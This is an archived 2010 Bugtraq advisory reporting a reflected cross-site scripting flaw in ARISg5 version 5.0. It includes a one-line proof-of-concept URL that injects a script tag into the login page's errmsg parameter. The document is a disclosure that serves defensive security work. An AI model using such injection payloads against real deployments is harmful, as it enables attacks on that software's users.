New User, Welcome! Login

ARISg5 (version 5.0) cross site scripting vulnerability

From:	"Yaniv Miron" <lament ilhack org>
To:	<bugtraq securityfocus com>
Cc:
Subject:	ARISg5 (version 5.0) cross site scripting vulnerability
Date:	Thu - Feb 25, 2010 05:58 PM

Hello,
Please see the following report:

ARISg5 (version 5.0) cross site scripting vulnerability
-----------------------------------------------------------------------
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error 
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron
Exploit:

http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>

Yaniv Miron aka "Lament".
lament@ilhack.org

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!